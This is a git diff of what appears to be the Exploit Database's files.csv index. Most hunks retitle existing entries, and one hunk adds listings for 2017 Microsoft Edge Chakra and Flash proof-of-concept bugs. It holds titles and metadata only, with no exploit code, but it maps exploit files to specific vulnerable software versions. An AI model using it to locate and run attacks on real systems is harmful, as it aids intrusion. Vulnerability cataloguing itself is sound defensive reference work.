diff --git a/files.csv b/files.csv
index 0ebddebf4..40e3c2a9f 100644
--- a/files.csv
+++ b/files.csv
@@ -306,7 +306,7 @@ id,file,description,date,author,platform,type,port
 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0
 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
 1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
-1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) (PoC)",2006-03-27,posidron,windows,dos,0
+1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (PoC)",2006-03-27,posidron,windows,dos,0
 1622,platforms/multiple/dos/1622.pl,"RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0
 1633,platforms/windows/dos/1633.c,"Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)",2006-04-02,darkeagle,windows,dos,0
 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r - Malformed .mp3 (SIGSEGV) (PoC)",2006-04-02,nitr0us,linux,dos,0
@@ -1423,7 +1423,7 @@ id,file,description,date,author,platform,type,port
 11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service (PoC)",2010-03-06,Blade,windows,dos,0
 11644,platforms/multiple/dos/11644.py,"Flare 0.6 - Local Heap Overflow Denial of Service",2010-03-06,l3D,multiple,dos,0
 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0
-11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
+11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0
 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0
 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0
 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0
@@ -5641,6 +5641,24 @@ id,file,description,date,author,platform,type,port
 42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
 42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0
 42451,platforms/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos,0
+42464,platforms/windows/dos/42464.html,"Microsoft Edge Chakra - 'PreVisitCatch' Missing Call",2017-08-17,"Google Security Research",windows,dos,0
+42465,platforms/windows/dos/42465.html,"Microsoft Edge Chakra - 'chakra!Js::GlobalObject' Integer overflow",2017-08-17,"Huang Anwen",windows,dos,0
+42466,platforms/windows/dos/42466.html,"Microsoft Edge Chakra - Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos,0
+42467,platforms/windows/dos/42467.html,"Microsoft Edge Chakra - NULL Pointer Dereference",2017-08-17,"Huang Anwen",windows,dos,0
+42468,platforms/windows/dos/42468.html,"Microsoft Edge Chakra - Heap Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos,0
+42469,platforms/windows/dos/42469.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses",2017-08-17,"Google Security Research",windows,dos,0
+42470,platforms/windows/dos/42470.html,"Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule'",2017-08-17,"Google Security Research",windows,dos,0
+42471,platforms/windows/dos/42471.html,"Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty'",2017-08-17,"Google Security Research",windows,dos,0
+42472,platforms/windows/dos/42472.html,"Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing",2017-08-17,"Google Security Research",windows,dos,0
+42473,platforms/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos,0
+42474,platforms/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos,0
+42475,platforms/windows/dos/42475.html,"Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly",2017-08-17,"Google Security Research",windows,dos,0
+42476,platforms/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments",2017-08-17,"Google Security Research",windows,dos,0
+42477,platforms/windows/dos/42477.html,"Microsoft Edge Chakra - Uninitialized Arguments (2)",2017-08-17,"Google Security Research",windows,dos,0
+42478,platforms/windows/dos/42478.html,"Microsoft Edge Chakra - 'EmitNew' Integer Overflow",2017-08-17,"Google Security Research",windows,dos,0
+42479,platforms/windows/dos/42479.html,"Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3",2017-08-17,"Google Security Research",windows,dos,0
+42480,platforms/windows/dos/42480.txt,"Adobe Flash - Invoke Accesses Trait Out-of-Bounds",2017-08-17,"Google Security Research",windows,dos,0
+42481,platforms/windows/dos/42481.js,"Microsoft Edge - Out-of-Bounds Access when Fetching Source",2017-08-17,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6644,7 +6662,7 @@ id,file,description,date,author,platform,type,port
 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal Overflow (SEH)",2010-01-16,Dz_attacker,windows,local,0
 11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (1)",2010-01-16,Red-D3v1L,windows,local,0
-11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,windows,local,0
+11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Buffer Overflow (Direct RET)",2010-01-17,jacky,windows,local,0
 11174,platforms/windows/local/11174.c,"VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) - '.ass' Buffer Overflow",2010-01-17,"fl0 fl0w",windows,local,0
 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0
 11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0
@@ -6772,7 +6790,7 @@ id,file,description,date,author,platform,type,port
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0
 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0
-14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0
+14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0
 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0
 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0
@@ -7140,7 +7158,7 @@ id,file,description,date,author,platform,type,port
 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0
 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - '.m3u' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
-17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
+17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Professional / Standard - '.plf' File Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local,0
 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local,0
 17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local,0
@@ -7589,7 +7607,7 @@ id,file,description,date,author,platform,type,port
 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,cgi,local,0
 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local,0
 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local,0
-20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - Checkin.prog Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0
+20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - 'Checkin.prog' Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0
 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0
 20126,platforms/irix/local/20126.c,"IRIX 6.5.x - GR_OSView Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0
 20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so - Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0
@@ -8072,8 +8090,8 @@ id,file,description,date,author,platform,type,port
 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Privilege Escalation (1)",2003-07-16,DVDMAN,unix,local,0
 22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Privilege Escalation (2)",2003-07-16,nic,unix,local,0
 22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0
-22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct Retn Exploit",2012-11-26,Nezim,windows,local,0
-22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - Direct Retn Exploit",2012-11-26,Nezim,windows,local,0
+22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct Retn)",2012-11-26,Nezim,windows,local,0
+22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn)",2012-11-26,Nezim,windows,local,0
 23007,platforms/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,windows,local,0
 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local,0
 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,linux,local,0
@@ -8147,7 +8165,7 @@ id,file,description,date,author,platform,type,port
 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0
 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
-23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit (DEP + ASLR Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
+23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
 23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0
 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0
 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local,0
@@ -8279,9 +8297,9 @@ id,file,description,date,author,platform,type,port
 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0
 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0
 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0
-26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0
+26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn)",2013-06-24,Onying,windows,local,0
 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0
-26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
+26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn)",2013-06-26,Onying,windows,local,0
 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0
 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0
 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0
@@ -8300,7 +8318,7 @@ id,file,description,date,author,platform,type,port
 26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0
-26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0
+26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0
 40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0
 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0
@@ -8364,7 +8382,7 @@ id,file,description,date,author,platform,type,port
 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
 29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0
-34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
+34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0
 29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0
 29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
@@ -8560,7 +8578,7 @@ id,file,description,date,author,platform,type,port
 34313,platforms/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0
 34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0
 34333,platforms/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0
-34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0
+34331,platforms/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0
 34421,platforms/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0
 34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,windows,local,0
 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,windows,local,0
@@ -8740,7 +8758,7 @@ id,file,description,date,author,platform,type,port
 38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
-38136,platforms/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
+38136,platforms/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID Root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38137,platforms/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
@@ -9180,7 +9198,7 @@ id,file,description,date,author,platform,type,port
 42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 -  GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
-42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
+42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
@@ -9644,7 +9662,7 @@ id,file,description,date,author,platform,type,port
 1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
 1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
 1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
-1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
+1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass",2006-05-16,redsand,multiple,remote,5900
 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0
 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110
@@ -19855,7 +19873,7 @@ id,file,description,date,author,platform,type,port
 6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
 6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
-6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
+6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
 6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Parameter Local File Inclusion",2008-07-31,NoGe,php,webapps,0
 6180,platforms/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' Parameter SQL Injection",2008-08-01,CraCkEr,php,webapps,0
@@ -29174,9 +29192,9 @@ id,file,description,date,author,platform,type,port
 26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0
 26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0
 26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0
-26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - reply.pl Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
-26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - stats.pl Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
-26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - toc.pl board Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
+26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
+26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
+26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl' 'board' Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
 26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - forum.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
 26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 - profile.cgi user Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
 26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - post.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
@@ -35344,7 +35362,7 @@ id,file,description,date,author,platform,type,port
 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
 36490,platforms/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
-36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI redirection",2012-01-04,"Mesut Timur",php,webapps,0
+36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0
 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0
 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0
 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0
@@ -36018,7 +36036,7 @@ id,file,description,date,author,platform,type,port
 37484,platforms/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0
 37485,platforms/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0
 37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0
-37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0
+37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0
 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0
 37563,platforms/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0
